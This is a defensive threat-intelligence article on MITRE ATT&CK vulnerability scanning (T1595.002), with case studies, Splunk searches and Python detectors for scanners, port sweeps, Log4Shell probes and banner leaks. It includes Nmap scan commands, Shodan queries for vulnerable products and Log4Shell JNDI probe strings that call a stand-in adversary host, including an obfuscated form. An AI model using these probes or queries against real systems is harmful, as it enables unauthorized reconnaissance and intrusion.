Vulnerability scanning occupies the earliest observable phase of a targeted intrusion. Before an adversary attempts to exploit a system, they need to know what software is running on it, what version that software is, and whether any known vulnerabilities apply. T1595.002 formalizes this reconnaissance in the MITRE ATT&CK framework as a sub-technique of Active Scanning (T1595), distinguishing targeted vulnerability enumeration from broader IP block scanning (T1595.001) and wordlist-based content discovery (T1595.003).
The technique operates at the PRE platform level — meaning it takes place before any systems are compromised — and falls under the Reconnaissance tactic (TA0043). Information gathered through vulnerability scanning feeds directly into subsequent ATT&CK stages: it identifies targets for Exploit Public-Facing Application (T1190), informs capability development and acquisition (T1587, T1588), and may reveal opportunities for further passive reconnaissance through open technical databases and search engine indexing.
F5 Labs observed a 71% increase in vulnerability scanning traffic on their sensor network between 2023 and 2024 — approximately 8.7 million HTTP requests targeting specific CVEs in 2024 alone, up from 5.1 million in 2023. This figure represents only CVE-specific probes and excludes the far larger volume of general reconnaissance traffic. Any system exposed to the internet should be treated as continuously scanned.
How Vulnerability Scanning Works
Adversary vulnerability scanning typically proceeds through two stages: broad surface mapping to identify live hosts and open services, followed by targeted probing to enumerate software versions and check specific vulnerability conditions.
Surface Mapping — Port and Service Discovery
Nmap remains the most widely used tool for port scanning and service version detection. A typical pre-intrusion scan combines SYN scanning to identify open ports, service version detection to read application banners, and OS fingerprinting to identify the underlying operating system:
```bash
# Nmap service version detection across common internet-facing ports
# -sV: probe open ports to determine service and version
# -sC: run default scripts for additional info gathering
# --open: only show open ports
nmap -sV -sC --open -p 22,80,443,8080,8443,3389,445,21,25 target.example.com

# Aggressive scan including OS detection — generates more noise
nmap -A -T4 target.example.com
```
Masscan trades depth for speed, scanning the entire IPv4 address space in minutes when run from adequate bandwidth. Nation-state groups — particularly Ember Bear (GRU Unit 29155) — have used Masscan to rapidly identify vulnerable targets across broad IP ranges, then feed the results into more targeted follow-up scans. Masscan is particularly effective for identifying internet-wide exposure of specific ports associated with a newly disclosed vulnerability.
Passive Indexing Services — Shodan and Censys
Adversaries do not always need to send traffic directly to a target. Internet scanning services including Shodan, Censys, and FOFA continuously crawl and index internet-accessible services, storing banner information, TLS certificates, HTTP headers, and software version strings. An adversary can query Shodan for all hosts running a specific vulnerable software version — for example, all Exchange servers exposing an OWA login page on a specific build number — without ever sending a packet to those servers directly.
GRU Unit 29155 cyber actors were specifically documented in the September 2024 CISA advisory as using Shodan to identify IoT devices and scan for internet-connected hosts with specific vulnerability profiles before attempting exploitation. APT40 (PRC Ministry of State Security) similarly leverages internet scanning services to identify vulnerable, end-of-life, or unpatched devices as reconnaissance prior to rapid exploitation.
```text
# Example Shodan queries used in adversary reconnaissance

# Find Apache servers exposing version in banner (identifies CVE-2021-41773 candidates)
apache version:2.4.49

# Find Ivanti Connect Secure instances
http.title:"Please Login" product:"Ivanti Connect Secure"

# Find exposed Exchange OWA login pages
http.title:"Outlook Web App" http.component:"Microsoft Exchange"

# Find devices with default credentials still exposed
default password http.component:"Hikvision"
```
Application-Layer Vulnerability Scanners
Beyond port and service enumeration, adversaries deploy specialized application-layer scanners against identified web targets. Acunetix performs automated web application scanning including SQL injection detection, XSS testing, and directory traversal probing. APT41 used Acunetix in target reconnaissance operations to identify SQL injection vulnerabilities, and Winter Vivern has used remotely hosted Acunetix instances against government and defense web portals. JexBoss specifically targets Java application servers (JBoss, WildFly) for known deserialization and remote code execution vulnerabilities — APT41 has used this tool to enumerate Java application vulnerabilities as part of pre-intrusion reconnaissance.
CVE-Targeted Probing
When a high-value CVE is disclosed publicly, nation-state actors frequently begin scanning within hours. Magic Hound (APT35, Charming Kitten) scanned for Log4Shell (CVE-2021-44228), ProxyShell Exchange vulnerabilities, and Fortinet FortiOS VPN flaws shortly after disclosure. Aquatic Panda used DNS logging services to find Log4j-vulnerable servers: the group sent specially crafted JNDI lookup strings in HTTP headers to target systems and watched for the outbound DNS callbacks that only vulnerable instances would make. This callback-based approach is particularly valuable because it requires no direct response — the target system reveals its vulnerability by making an outbound DNS request to an adversary-controlled domain.
```text
# Log4Shell detection probe pattern (sent as HTTP header values)
# Vulnerable Log4j instances make outbound JNDI DNS lookups
# Adversaries monitor their DNS server for callbacks
User-Agent: ${jndi:ldap://adversary-dns-server.com/scan-id}
X-Api-Version: ${jndi:dns://adversary-dns-server.com/CVE-2021-44228}
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:ldap://callback.adversary.com/}
```
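The third probe above matters for detection: a WAF or log rule that simply looks for the substring `jndi:` misses it, because the string is assembled from nested `${::-x}` default-value lookups that only a Log4j instance would evaluate. The following added example (written for this article, not Log4j's own lookup engine and not code from any report cited here) normalizes header values the way a vulnerable logger would before matching, so the obfuscated form is caught and the callback host is extracted for correlation with outbound DNS logs. It models only the lookup forms needed for this purpose (`${prefix:key:-default}`, `${lower:x}`, `${upper:x}`), which is a deliberate simplification; the request headers are constructed, not captured traffic.

```python
import re

# Innermost ${...} lookup, i.e. one whose body contains no nested braces.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A de-obfuscated JNDI lookup: "jndi:<scheme>://<host>[:port]/..."
_JNDI = re.compile(r"jndi:[a-z]+://([^/\s:]+)", re.IGNORECASE)


def _resolve_lookup(body: str) -> str:
    """Return the literal text one Log4j-style lookup body evaluates to.

    Simplified model of the lookup syntax (an assumption for this example,
    not Log4j's implementation); only the forms used in common obfuscation:
      '::-j'         -> 'j'      empty prefix and key, default value used
      'env:NOPE:-j'  -> 'j'      unknown variable, default value used
      'lower:JNDI'   -> 'jndi'
      'upper:ldap'   -> 'LDAP'
    Any other body (e.g. 'jndi:ldap://host/x') is returned unchanged so the
    detector sees it as plain text.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    return body


def normalize(value: str, max_rounds: int = 32) -> str:
    """Collapse nested lookups from the inside out until no ${...} remains.

    The round budget bounds the work on pathological input; a value that still
    contains '${' after the budget is returned as-is (and remains suspicious).
    """
    for _ in range(max_rounds):
        collapsed = _INNER_LOOKUP.sub(lambda m: _resolve_lookup(m.group(1)), value)
        if collapsed == value:
            break
        value = collapsed
    return value


def find_jndi_callbacks(headers: dict) -> list:
    """Inspect request headers and report every JNDI lookup found.

    Each finding is (header_name, callback_host, was_obfuscated). The host is
    what a vulnerable logger would resolve, so it is the value to look for in
    outbound DNS logs from the application server.
    """
    findings = []
    for name, raw in headers.items():
        norm = normalize(raw)
        hit = _JNDI.search(norm)
        if hit:
            findings.append((name, hit.group(1).lower(), _JNDI.search(raw) is None))
    return findings


# Constructed request headers (not captured traffic): the three probe variants
# shown above, plus benign headers that must not match.
SAMPLE_HEADERS = {
    "Host": "www.example.com",
    "User-Agent": "${jndi:ldap://adversary-dns-server.com/scan-id}",
    "X-Api-Version": "${jndi:dns://adversary-dns-server.com/CVE-2021-44228}",
    "X-Forwarded-For": "${${::-j}${::-n}${::-d}${::-i}:ldap://callback.adversary.com/}",
    "Referer": "https://www.example.com/docs?q=${price}",
    "Accept": "text/html",
}

if __name__ == "__main__":
    for header, host, obfuscated in find_jndi_callbacks(SAMPLE_HEADERS):
        tag = " (obfuscated)" if obfuscated else ""
        print(f"{header}: JNDI callback to {host}{tag}")
```

Run against the sample, the plain probes report their hosts directly and the `X-Forwarded-For` variant is flagged as obfuscated with `callback.adversary.com` as its callback host; the `${price}` placeholder in the Referer is not a JNDI lookup and produces no finding.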
Real-World Case Studies
APT40 / Leviathan — Rapid Exploitation Targeting End-of-Life Devices
The July 2024 joint advisory from CISA, ASD, NCSC, and partner agencies on APT40 tradecraft documented the group's systematic reconnaissance of target networks specifically searching for vulnerable, end-of-life, and no longer maintained devices. APT40 exploits vulnerabilities in public-facing infrastructure rapidly — often within hours of public disclosure — by maintaining an ongoing picture of their targets' external attack surface through continuous scanning and monitoring of vulnerability databases and exploit repositories. The advisory noted that APT40 pays particular attention to devices that organizations may deprioritize for patching due to legacy status, using vulnerability scanning to identify precisely the systems most likely to remain unpatched.
Ember Bear / GRU Unit 29155 — MASSCAN and Acunetix Against Critical Infrastructure
Ember Bear, documented in the September 2024 CISA advisory on Russian military cyber actors targeting US and global critical infrastructure, used publicly available tools including MASSCAN and Acunetix as core components of their pre-intrusion reconnaissance workflow. MASSCAN enabled rapid identification of open ports and services across broad IP ranges associated with target infrastructure. Acunetix provided web application vulnerability discovery against identified public-facing hosts. The advisory also specifically documented the group's use of Shodan to identify internet-connected IoT devices, including IP cameras, which were then accessed using default credentials — demonstrating how scanning reconnaissance feeds directly into T1078 (Valid Accounts) exploitation via discovered default credentials.
Magic Hound — Scanning for Log4Shell Within Hours of Disclosure
In December 2021, Magic Hound (APT35, Iran) began scanning for Log4Shell-vulnerable servers within hours of CVE-2021-44228's public disclosure. Check Point documented the group deploying a custom PowerShell toolkit against Log4j-vulnerable targets identified through active scanning. Magic Hound had previously demonstrated the same rapid scanning pattern against ProxyShell Exchange vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) and Fortinet FortiOS flaws (CVE-2018-13379). The consistency of this pattern illustrates how vulnerability scanning is not a one-time activity but an ongoing operational process — these groups maintain continuous awareness of their targets' patch status across many CVEs simultaneously.
APT41 — Acunetix and JexBoss in Targeted Web Application Reconnaissance
APT41 deployed Acunetix web application scanners against targets during reconnaissance operations to identify SQL injection vulnerabilities, supplementing general web application scanning with JexBoss for Java-specific vulnerability enumeration. CrowdStrike and Mandiant reporting on APT41 activity documented this combination of commercial and open-source scanning tools being used against organizations across government, manufacturing, healthcare, and technology sectors. APT41's scanning activity was specifically designed to identify web application entry points that could provide initial access into broader enterprise networks, with the scan results directly informing subsequent exploitation decisions.
Detection Strategies
Detecting vulnerability scanning is inherently challenging because scanning traffic arrives from the public internet in a high-noise environment where background scanning from security researchers, search engines, and opportunistic bots is constant. The key challenge is distinguishing targeted adversary scanning from background noise and prioritizing response accordingly.
Web Application Firewall and IDS — Scanner Detection
```spl
# Splunk: detect known vulnerability scanner user-agent strings in web logs
index=web sourcetype=access_combined
| search useragent IN (
    "*Acunetix*",
    "*Nikto*",
    "*sqlmap*",
    "*Nessus*",
    "*OpenVAS*",
    "*masscan*",
    "*zgrab*",
    "*nuclei*"
  )
| stats count by clientip, useragent, uri_path
| sort - count
```

```spl
# Splunk: detect rapid sequential requests testing multiple vulnerability payloads
# Characteristic of automated scanners probing a single endpoint
index=web sourcetype=access_combined
| bucket _time span=60s
| stats count as req_count, dc(uri_path) as paths_tested by _time, clientip
| where req_count > 100 AND paths_tested > 20
| sort - req_count
```
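For environments without Splunk, or to unit-test the thresholds before deploying them, the same two searches can be expressed directly over access-log lines. The example below is added here and is not code from the article's sources: it parses combined-format log lines, applies the known-scanner user-agent list from the first search, and applies the 60-second bucket with the `req_count > 100 AND paths_tested > 20` condition from the second. The log lines are constructed for the example, not real traffic, and the Nikto user-agent string is used only as a sample of what the list matches.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined access-log line (Apache/nginx default format).
_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# The substrings the first Splunk search matches, compared case-insensitively.
SCANNER_UA = ("acunetix", "nikto", "sqlmap", "nessus", "openvas", "masscan", "zgrab", "nuclei")


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if malformed."""
    m = _LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["epoch"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z").timestamp()
    rec["path"] = rec["uri"].split("?", 1)[0]  # uri_path: drop the query string
    return rec


def known_scanner_hits(records):
    """First search: requests whose user-agent names a known scanner,
    counted by (client IP, user-agent, path), highest count first."""
    counts = defaultdict(int)
    for r in records:
        ua = r["ua"].lower()
        if any(tool in ua for tool in SCANNER_UA):
            counts[(r["ip"], r["ua"], r["path"])] += 1
    return sorted(counts.items(), key=lambda kv: -kv[1])


def burst_sources(records, span=60, min_requests=100, min_paths=20):
    """Second search: per 60 s bucket and client IP, flag sources that sent more
    than min_requests requests touching more than min_paths distinct paths."""
    reqs, paths = defaultdict(int), defaultdict(set)
    for r in records:
        key = (int(r["epoch"] // span) * span, r["ip"])
        reqs[key] += 1
        paths[key].add(r["path"])
    flagged = []
    for (bucket, ip), n in reqs.items():
        distinct = len(paths[(bucket, ip)])
        if n > min_requests and distinct > min_paths:
            flagged.append((ip, bucket, n, distinct))
    return sorted(flagged, key=lambda row: -row[2])


def sample_log():
    """Constructed log lines (not real traffic): one automated burst of 130
    requests to 130 distinct paths inside a single minute, two requests carrying
    a Nikto user-agent, and ordinary browsing that must not be flagged."""
    stamp = "10/Mar/2025:12:00:{:02d} +0000"
    lines = [
        f'203.0.113.7 - - [{stamp.format(i % 60)}] "GET /probe-{i}.php HTTP/1.1" 404 153 "-" "Mozilla/5.0"'
        for i in range(130)
    ]
    lines += [
        f'198.51.100.9 - - [{stamp.format(30)}] "GET /cgi-bin/test.cgi HTTP/1.1" 404 153 "-" "Mozilla/5.00 (Nikto/2.1.6)"',
        f'198.51.100.9 - - [{stamp.format(31)}] "GET /admin/ HTTP/1.1" 403 199 "-" "Mozilla/5.00 (Nikto/2.1.6)"',
    ]
    lines += [
        f'192.0.2.44 - - [{stamp.format(5 + i)}] "GET /docs/page{i % 3}.html?ref=nav HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux)"'
        for i in range(8)
    ]
    return lines


def run_detections(lines):
    """Parse the lines and return (known-scanner hits, burst sources)."""
    records = [r for r in map(parse_line, lines) if r]
    return known_scanner_hits(records), burst_sources(records)


if __name__ == "__main__":
    hits, bursts = run_detections(sample_log())
    for (ip, ua, path), n in hits:
        print(f"scanner UA: {ip} {ua!r} {path} x{n}")
    for ip, bucket, n, distinct in bursts:
        print(f"burst: {ip} sent {n} requests to {distinct} paths in bucket {bucket}")
```

The burst check deliberately keys on distinct `uri_path` values rather than raw request count alone, which is what separates a scanner walking a wordlist from a busy legitimate client reloading the same few pages; the 8-request browsing client in the sample stays well under both thresholds.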
Network Layer — Scan Pattern Detection
```spl
# Splunk: detect SYN scan patterns — many ports, single source, within time window
index=network sourcetype=firewall action=deny
| bucket _time span=30s
| stats dc(dest_port) as ports_scanned, count by _time, src_ip
| where ports_scanned > 50
| sort - ports_scanned
```
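The same port-scan logic, applied to firewall deny events outside Splunk, as an added example that is not part of the article or its sources. It counts distinct destination ports per 30-second bucket and source IP, applies the `ports_scanned > 50` threshold, and additionally reports whether the ports form one contiguous run, the sequential pattern that distinguishes a linear sweep from scattered connection failures. The key=value event format and the events themselves are constructed for this example and do not represent any particular firewall vendor's log layout.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed key=value deny event, e.g.
# 2025-03-10T12:00:01Z action=deny src=198.51.100.23 dst=192.0.2.10 dpt=22
_EVENT = re.compile(
    r"^(?P<ts>\S+) action=(?P<action>\w+) src=(?P<src>\S+) dst=(?P<dst>\S+) dpt=(?P<dpt>\d+)$"
)


def parse_event(line):
    """Parse one event line into a dict, or return None if it does not match."""
    m = _EVENT.match(line)
    if not m:
        return None
    e = m.groupdict()
    ts = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    e["epoch"] = ts.timestamp()
    e["dpt"] = int(e["dpt"])
    return e


def port_scan_sources(events, span=30, min_ports=50):
    """Per 30 s bucket and source IP, count distinct destination ports on denied
    connections and flag sources above min_ports. 'sequential' is True when the
    ports seen form one unbroken range (a linear sweep)."""
    ports = defaultdict(set)
    denied = defaultdict(int)
    for e in events:
        if e["action"] != "deny":
            continue
        key = (int(e["epoch"] // span) * span, e["src"])
        ports[key].add(e["dpt"])
        denied[key] += 1
    rows = []
    for (bucket, src), seen in ports.items():
        if len(seen) > min_ports:
            rows.append({
                "src": src,
                "bucket": bucket,
                "ports_scanned": len(seen),
                "denied": denied[(bucket, src)],
                "sequential": max(seen) - min(seen) + 1 == len(seen),
            })
    return sorted(rows, key=lambda r: -r["ports_scanned"])


def sample_events():
    """Constructed events: one source sweeping ports 1-80 within eight seconds,
    one source retrying a single blocked port, and one allowed flow."""
    lines = [
        f"2025-03-10T12:00:{i // 10:02d}Z action=deny src=198.51.100.23 dst=192.0.2.10 dpt={i + 1}"
        for i in range(80)
    ]
    lines += [
        f"2025-03-10T12:00:{i:02d}Z action=deny src=203.0.113.5 dst=192.0.2.10 dpt=3389"
        for i in range(20)
    ]
    lines.append("2025-03-10T12:00:03Z action=allow src=192.0.2.77 dst=192.0.2.10 dpt=443")
    return lines


def run(lines):
    """Parse the lines and return the flagged sources."""
    return port_scan_sources([e for e in map(parse_event, lines) if e])


if __name__ == "__main__":
    for row in run(sample_events()):
        kind = "sequential sweep" if row["sequential"] else "scattered ports"
        print(f"{row['src']}: {row['ports_scanned']} ports, {row['denied']} denies, {kind}")
```

The retrying client in the sample generates 20 denies but touches only one port, so it is not reported; a host that hammers RDP is a different problem from a host mapping every service you expose.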
Behavioral Indicators
| Indicator | What It Means |
|---|---|
| Single source IP generating requests to a large number of distinct URI paths within a short time window | Automated vulnerability scanner or directory brute-force — characteristic of Acunetix, Nikto, and Nuclei scanning patterns |
| Known scanner user-agent strings (Acunetix, sqlmap, Nikto, masscan, zgrab) appearing in web access logs | Adversary using commercial or open-source scanning tooling without user-agent spoofing — provides direct tool attribution if confirmed as targeted |
| Outbound DNS queries from internal systems to domains following a JNDI lookup pattern (e.g., ldap:// or dns:// prefixes in query strings) | Possible Log4Shell callback — the target system may be probing an adversary-controlled DNS server after receiving a crafted payload in an HTTP header |
| Large number of denied connections to a range of sequential destination ports from a single external source IP | Port scan in progress — network-layer indicator for T1595.001/T1595.002 combined activity mapping open services before vulnerability probing |
| HTTP requests containing SQL injection, path traversal, or template injection payloads in query strings or POST bodies | Application-layer vulnerability probing — direct scanning for exploitable input handling, characteristic of Acunetix and sqlmap activity |
Known Threat Actors Using T1595.002
Vulnerability scanning is a near-universal pre-intrusion technique among sophisticated threat actors. The following groups are specifically documented by MITRE ATT&CK and supporting intelligence reporting as users of this technique.
- APT40 / Leviathan (China, MSS) — Systematically scans target networks for vulnerable, end-of-life, and unpatched internet-facing devices. Documented in the 2024 joint CISA/ASD/NCSC APT40 tradecraft advisory as exploiting newly disclosed CVEs within hours of public disclosure following active scanning to identify candidates.
- APT41 / BARIUM (China, dual espionage/cybercrime) — Uses Acunetix for SQL injection vulnerability scanning and JexBoss for Java application server reconnaissance against targets across multiple sectors.
- Ember Bear / GRU Unit 29155 (Russia, GRU) — Uses MASSCAN for rapid internet-wide port scanning, Acunetix for web application vulnerability discovery, and Shodan for passive identification of vulnerable IoT devices and network infrastructure.
- Magic Hound / APT35 (Iran, IRGC) — Conducts rapid scanning for newly disclosed CVEs, specifically documented scanning for Log4Shell, ProxyShell, and Fortinet FortiOS vulnerabilities within hours of public disclosure.
- APT28 / Fancy Bear (Russia, GRU) — Has conducted large-scale scanning for exploitable servers as part of pre-intrusion reconnaissance supporting subsequent credential-based and exploitation-based initial access operations.
- Dragonfly / TEMP.Isotope (Russia) — Scanned for vulnerable Citrix and Exchange services as part of reconnaissance against energy sector and critical infrastructure targets.
- Winter Vivern (Belarus/Russia-aligned) — Uses remotely hosted Acunetix instances for vulnerability scanning of government and defense web portals as part of espionage operations targeting European government entities.
- TeamTNT (cybercrime, cloud-focused) — Conducts scanning of cloud infrastructure and container environments to identify misconfigured Docker APIs and vulnerable Kubernetes deployments for cryptomining deployment.
Defensive Recommendations
- Conduct continuous external attack surface management: Defenders should have better visibility into their own external attack surface than adversaries. Deploy attack surface management (ASM) tools that continuously enumerate internet-exposed assets, identify outdated software versions, and flag exposure of services that should not be publicly accessible. Organizations that identify and remediate vulnerabilities before scanning adversaries discover them eliminate the intelligence value of T1595.002 against their environment.
- Suppress version information from server banners and HTTP headers: Server banners, HTTP response headers (Server:, X-Powered-By:, X-AspNet-Version:), and application error messages often reveal precise software versions that adversary scanners harvest to identify vulnerability targets. Configure web servers, application servers, and network appliances to suppress detailed version strings. This does not prevent exploitation of known vulnerabilities, but it forces adversaries to attempt blind exploitation rather than targeted version-matched attacks, increasing their noise footprint and reducing precision.
- Prioritize patching internet-facing services — particularly within 24 hours of critical CVE disclosure: The documented pattern of nation-state groups (APT40, Magic Hound) scanning for new CVEs within hours of public disclosure makes rapid patching of internet-facing systems a critical defensive priority. Maintain an inventory of all public-facing software and subscribe to vendor security advisories for each product. Implement a policy that critical CVEs in internet-facing systems receive emergency patch review within 24 hours, with patching completed before adversarial scanning is likely to have identified your exposure.
- Deploy WAF rules to detect and rate-limit scanner traffic: Web application firewalls can identify and block or rate-limit traffic exhibiting scanning patterns — sequential requests to non-existent paths, known scanner user-agent strings, SQL injection and path traversal probes in query strings. Scanner detection rules reduce the completeness of information adversaries can gather about web application attack surfaces. Combine WAF rules with IP reputation feeds that flag known scanning infrastructure.
- Monitor your own exposure through adversary tooling: Run Shodan, Censys, and FOFA queries against your own organization's IP ranges and domain names to see what adversaries see. This passive assessment reveals services that may have been inadvertently exposed, outdated software versions visible in banners, and certificates or metadata that could inform adversary targeting. Incorporate this into regular security reviews — ideally automated and scheduled monthly.
- Implement network segmentation to limit what scanning can reach: Services that do not require direct internet access should not be reachable from the internet. Implement network segmentation and firewall rules that expose only the minimal set of services required for business operations. Internal administrative interfaces, database ports, backup systems, and development infrastructure should never be reachable from external scanning sources. Every service eliminated from the internet-exposed attack surface is a target that vulnerability scanning cannot find.
- Alert on callback-based CVE probes in DNS and HTTP logs: Log4Shell-style callback probes can be detected by monitoring for outbound DNS queries to unusual domains following receipt of crafted HTTP requests, or by monitoring network egress for LDAP/RMI connections initiated by application server processes. Configure DNS filtering and monitoring to flag lookups to domains that follow adversary infrastructure patterns, and alert on application server processes making unexpected outbound network connections.
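A practical check for the banner-suppression recommendation above, added here as an example and not taken from any of the article's sources: given a raw HTTP response, it reports every header in the named set (`Server`, `X-Powered-By`, `X-AspNet-Version`, `X-AspNetMvc-Version`) that still carries a dotted version number, and also catches the default Apache error-page signature in the body, which leaks the version even when the `Server` header has been trimmed. The two responses are constructed; the second shows the same server after the real Apache directives `ServerTokens Prod` and `ServerSignature Off` and the PHP setting `expose_php = Off` are applied.

```python
import re

# Response headers that commonly carry an exact product version.
VERSION_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")

# A dotted version token such as 2.4.49 or 7.4.3 (at least one dot required).
_VERSION = re.compile(r"\b\d+\.\d+(?:\.\d+)*\b")

# Default Apache error-page signature, e.g.
# <address>Apache/2.4.49 (Ubuntu) Server at www.example.com Port 80</address>
_SIGNATURE = re.compile(r"<address>([^<]*Server at[^<]*)</address>", re.IGNORECASE)


def parse_response(raw: str):
    """Split a raw HTTP/1.x response into (status_line, headers, body).
    Header names are lower-cased; a repeated header keeps its last value."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def audit_response(raw: str):
    """Return (location, disclosed_text, version) for every place in the
    response that leaks a precise software version."""
    _, headers, body = parse_response(raw)
    findings = []
    for name in VERSION_HEADERS:
        value = headers.get(name)
        if value:
            m = _VERSION.search(value)
            if m:
                findings.append((name, value, m.group(0)))
    for signature in _SIGNATURE.findall(body):
        m = _VERSION.search(signature)
        if m:
            findings.append(("body-signature", signature.strip(), m.group(0)))
    return findings


# Constructed responses (not captured from a real server).
LEAKY_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: Apache/2.4.49 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><h1>Not Found</h1>\n"
    "<address>Apache/2.4.49 (Ubuntu) Server at www.example.com Port 80</address>\n"
    "</body></html>\n"
)

# The same server after 'ServerTokens Prod' and 'ServerSignature Off' in the
# Apache config and 'expose_php = Off' in php.ini: the Server header is reduced
# to the product name, X-Powered-By is gone, and the error page has no signature.
HARDENED_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><h1>Not Found</h1></body></html>\n"
)

if __name__ == "__main__":
    for label, raw in (("leaky", LEAKY_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        findings = audit_response(raw)
        print(f"{label}: {len(findings)} version disclosure(s)")
        for location, text, version in findings:
            print(f"  {location}: {text!r} -> {version}")
```

Running it on the first response lists three disclosures (the `Server` header, `X-Powered-By`, and the error-page signature) and none on the second. The body check is the one most often forgotten: trimming the header while leaving `ServerSignature On` still tells a scanner the exact build from any 404.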
MITRE ATT&CK Mapping
| Field | Value |
|---|---|
| Technique ID | T1595.002 |
| Technique Name | Active Scanning: Vulnerability Scanning |
| Parent Technique | T1595 — Active Scanning |
| Tactic | Reconnaissance (TA0043) |
| Platforms | PRE (pre-compromise activity) |
| Data Sources | Network Traffic: Network Traffic Content; Network Traffic: Network Traffic Flow |
| Mitigations | M1056 Pre-compromise (limit information available to adversaries through attack surface reduction) |
| ATT&CK Version | v18 (Version 1.0, Last Modified: 15 April 2021) |
| MITRE Reference | attack.mitre.org/techniques/T1595/002 |
Frequently Asked Questions
What is T1595.002 Vulnerability Scanning?
T1595.002 Vulnerability Scanning is a MITRE ATT&CK Reconnaissance sub-technique in which adversaries actively probe internet-facing systems to identify configurations, software versions, and network artifacts that match known exploitable vulnerabilities. Unlike passive reconnaissance that relies on existing data sources, active vulnerability scanning sends direct network traffic to target systems to enumerate their attack surface before exploitation attempts.
What tools do adversaries use for vulnerability scanning?
Nation-state and criminal groups use both general-purpose and specialized tools. Nmap provides port scanning and service/version detection. Masscan performs high-speed internet-wide port sweeps. Shodan and Censys index internet-exposed services and can be queried for specific software versions or configurations without sending traffic to the target. Acunetix performs automated web application vulnerability scanning. JexBoss targets Java application server vulnerabilities. Custom scripts probe for specific CVEs within hours of public disclosure.
How can organizations defend against vulnerability scanning?
Defenders cannot prevent all scanning since it originates from the public internet, but they can reduce its value and detect it. Key measures include minimizing the external attack surface by disabling unnecessary services, suppressing detailed version information from server banners and HTTP headers, deploying WAF rate limiting and scanner detection rules, monitoring for scanning patterns in network and web logs, and — most importantly — conducting regular internal vulnerability assessments to find and remediate weaknesses before adversaries can exploit what they discover.
Sources and References
- MITRE ATT&CK — T1595.002 Active Scanning: Vulnerability Scanning: attack.mitre.org
- CISA / ASD / NCSC et al. — People's Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action (July 2024): cisa.gov
- CISA / FBI / NSA et al. — Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure (AA24-249A, September 2024): cisa.gov
- Check Point Research — APT35 Exploits Log4j Vulnerability to Distribute New Modular PowerShell Toolkit: research.checkpoint.com
- CrowdStrike — OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools: crowdstrike.com
- F5 Labs — Analyzing the Global Increase in Vulnerability Scanning in 2024: f5.com
- Mandiant — Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts: mandiant.com
- SentinelOne — Winter Vivern: Uncovering a Wave of Global Espionage: sentinelone.com